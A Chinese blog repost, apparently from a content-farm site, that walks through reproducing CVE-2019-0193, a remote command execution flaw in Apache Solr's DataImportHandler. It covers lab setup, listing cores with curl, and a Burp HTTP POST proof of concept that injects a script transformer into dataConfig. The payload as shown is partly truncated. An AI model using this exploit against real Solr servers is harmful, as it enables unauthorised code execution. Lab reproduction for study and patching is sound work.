作者:平凡瞬间15 | 来源:互联网 | 2023-05-18 08:36
今天就跟大家聊聊有关ApacheSolr远程命令执行CVE-2019-0193漏洞复现的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以
今天就跟大家聊聊有关Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
0x01 影响范围
Apache Solr <8.2.0
0x02 环境搭建
下载地址:
https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip
在本地解压,进入solr-7.7.2目录,执行命令
bin/solr -e dih (前提:java环境)
然后访问http://localhost:8983/solr即可访问环境
0x03 漏洞利用
首先我们可以通过接口
curl http://127.0.0.1:8983/solr/admin/cores
来获取所有 core 信息,下面我们构造 payload 需要 name 信息
在Burp中发送以下POC即可执行命令弹出计算器,下面的 需要替换为你获取到的 core 的 name(共两处)
POST /solr//dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=&name=dataimport&dataCOnfig=
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
执行效果如下:
看完上述内容,你们对Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注编程笔记行业资讯频道,感谢大家的支持。